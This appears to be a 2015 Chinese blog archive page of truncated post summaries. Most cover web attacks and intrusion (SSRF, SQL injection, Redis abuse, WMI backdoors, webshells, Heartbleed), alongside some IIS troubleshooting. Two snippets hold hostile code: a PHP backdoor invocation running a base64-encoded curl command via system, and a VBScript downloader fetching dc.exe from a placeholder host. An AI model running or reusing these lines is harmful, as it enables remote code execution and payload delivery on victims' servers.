11 2015 档案

摘要:本文转自:https://sobug.com/article/detail/11SSRF概述SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为... 阅读全文
posted @ 2015-11-26 21:14 anything good 阅读(528) 评论(0) 推荐(0) 编辑
摘要:本文作者:浅蓝前段时间有人发过搜云的源码,都好长时间了。这次我放出个最新的。是在他换模板之前的源码。(现在的搜云后端基本没什么变化 换了个模板而已)同时审计出来了一些漏洞。。我里面的数据库配置信息等重要敏感信息换成了"马赛克"以下附上审计出的漏洞1.user.ph#sql注入265行$card = ... 阅读全文
posted @ 2015-11-26 18:21 anything good 阅读(2101) 评论(2) 推荐(0) 编辑
摘要:如何高效查询表的总记录数?[总结-整理-马克]首先想到的自然是在表主键上应用COUNT函数来查询了,这个是目前使用最多的方法,没有之一SELECT COUNT(1) ROWS FROM product这里再给出一些其它方法,这些方法或多或少会有一些限制,或者看起来不是那么"完美",但依然有一定的借鉴... 阅读全文
posted @ 2015-11-23 22:36 anything good 阅读(313) 评论(0) 推荐(0) 编辑
摘要:转自独自等待博客早上逛乌云发现了PKAV大牛的一篇文章,针对php和windows文件上传的分析,思路很YD,果断转之与大家分享。虽然此文可能有许多的限制条件,但是如果你认真阅读会发现,其实还是比较实用的。另外一篇团长发的pdf中也涉及到了相关的文章,是国外的nosec发布的,英文的,感兴趣的同学在... 阅读全文
posted @ 2015-11-20 23:20 anything good 阅读(499) 评论(0) 推荐(0) 编辑
摘要:作者:咪蒙,来源:咪蒙(mimeng7)我说过,我的情绪分为高兴、很高兴和非常高兴。每一个跟我相处过的人,都觉得像我这种24小时脸都笑烂了的傻逼,肯定是从出生到现在就一帆风顺,人生最大挫折就是眼睫毛又掉了两根吧?等他们看到我写的《我的爸爸,要结婚了》,都觉得不可思议。从初中开始,我家就成了狗血剧现场... 阅读全文
posted @ 2015-11-20 23:09 anything good 阅读(284) 评论(0) 推荐(0) 编辑
摘要:作者:dean用方法参数 id :需要执行的函数参数catid : 函数的参数(需要用base_64encode函数转一下)例如:http://www.php0.net/test.php?id=system&catid=Y3VybCBodHRwOi8vbG9jYWxob3N0L20udHh0ID4y... 阅读全文
posted @ 2015-11-18 18:54 anything good 阅读(617) 评论(0) 推荐(0) 编辑
摘要:Abusing WMI to Build a Persistent, Asynchronous, and Fileless Backdoor滥用 WMI 打造一个永久、异步、无文件后门http://dwz.cn/1fffBI(pdf) #Blackhat2015WMI - Windows Manag... 阅读全文
posted @ 2015-11-17 14:32 anything good 阅读(464) 评论(0) 推荐(0) 编辑
摘要:服务器配置不当包括三个部分:1.Redis服务使用ROOT账号启动2.Redis服务无密码认证或者使用的是弱口令进行认证3.服务器开放了SSH服务,而且允许使用密钥登录简单的写下过程测试环境victim server CentOS6.6 192.168.1.11attack server CentO... 阅读全文
posted @ 2015-11-12 15:52 anything good 阅读(814) 评论(0) 推荐(0) 编辑
摘要:Set xPost = createObject("Microsoft.XMLHTTP")xPost.Open "GET","http://www.xx.com/dc.exe",0 '下载文件的地址xPost.Send()Set sGet = createObject("ADODB.Stream")... 阅读全文
posted @ 2015-11-08 11:00 anything good 阅读(444) 评论(0) 推荐(0) 编辑
摘要:1.收集信息。1-1.无论是什么途径获得的内网机器,确定他在内网后,我们首先就要了解这台机器的所属人员,如果我们的目标是公司,那我们就要了解这个人在公司里的职位,他是个什么身份,有多大的权利,这都关系到他在内网里的权限。因为,作为大公司,一个高权限的人他在内网里所要用到的东西就多,那么相对他的机器,... 阅读全文
posted @ 2015-11-08 10:39 anything good 阅读(1190) 评论(0) 推荐(0) 编辑
摘要:用了菜刀用了也有一段时间了,感觉挺神奇了,这里做一个小小的探究吧,起始也就是用鲨鱼抓包看看软件是怎么通信实现的,不敢卖弄知识,权当学习笔记了,大神路过呵呵这货就是主界面,环境啥的就随意了,IIS,阿帕奇,阿金科斯都可以,我这里用apache,因为之前搞的是PHP开发,对PHP相对比较熟悉,随机就用P... 阅读全文
posted @ 2015-11-06 22:38 anything good 阅读(775) 评论(0) 推荐(0) 编辑
摘要:统:win8环境:vs2012一:安装IIS比较win7的安装来说,多选了几个钩钩,不然会报错,偶就遇到这样的错误。控制面板-》程序和功能-》启动和关闭windows功能,钩钩图例:装好之后在控制面板的管理工具下面有这个打开IIs管理器浏览80端口的网站,会出现如下图片表明安装成功2:发布网站,右击... 阅读全文
posted @ 2015-11-06 12:13 anything good 阅读(198) 评论(0) 推荐(0) 编辑
摘要:不久前重新安装了Windows7,在安装了VS2010 开发平台之后,将网站发布到IIS,访问发生如下错误:HTTP 错误 500.21 - Internal Server Error处理程序“NickLeeCallbackHandler”在其模块列表中有一个错误模块“ManagedPipeline... 阅读全文
posted @ 2015-11-05 16:57 anything good 阅读(216) 评论(0) 推荐(0) 编辑
摘要:“/CRM”应用程序中的服务器错误。配置错误说明: 在处理向该请求提供服务所需的配置文件时出错。请检查下面的特定错误详细信息并适当地修改配置文件。 分析器错误消息: 无法识别的属性“targetFramework”。请注意属性名称区分大小写。源错误: 行 24: 设置为 tr... 阅读全文
posted @ 2015-11-05 16:49 anything good 阅读(54771) 评论(2) 推荐(1) 编辑
摘要:转自:http://www.lijiejie.com/openssl-heartbleed-attack/ OpenSSL Heartbleed漏洞的公开和流行让许多人兴奋了一把,也让另一些人惊慌了一把。单纯从攻击的角度讲,我已知道的,网上公开的扫描工具有:1. Nmap脚本ssl-heartb... 阅读全文
posted @ 2015-11-02 21:53 anything good 阅读(2403) 评论(0) 推荐(0) 编辑
摘要:WCF部署在IIS下,报错如下:HTTP 错误 404.3 - Not Found由于扩展配置问题而无法提供您请求的页面。如果该页面是脚本,请添加处理程序。如果应下载文件,请添加 MIME 映射。可能是缺少处理程序映射。默认情况下,静态文件处理程序将处理所有内容。您要使用的功能可能尚未安装。没有为网... 阅读全文
posted @ 2015-11-01 20:06 anything good 阅读(3692) 评论(1) 推荐(0) 编辑
摘要:一:导入Access数据1、在sql2008查询分析 器中输入如下查询语句能查出access中的数据SELECT*FROMOpenDataSource('Microsoft.Jet.OLEDB.4.0','DataSource="e:\\xx.mdb";UserID=Admin;Password=;... 阅读全文
posted @ 2015-11-01 20:02 anything good 阅读(344) 评论(0) 推荐(0) 编辑

孤 's 博客
点击右上角即可分享
微信分享提示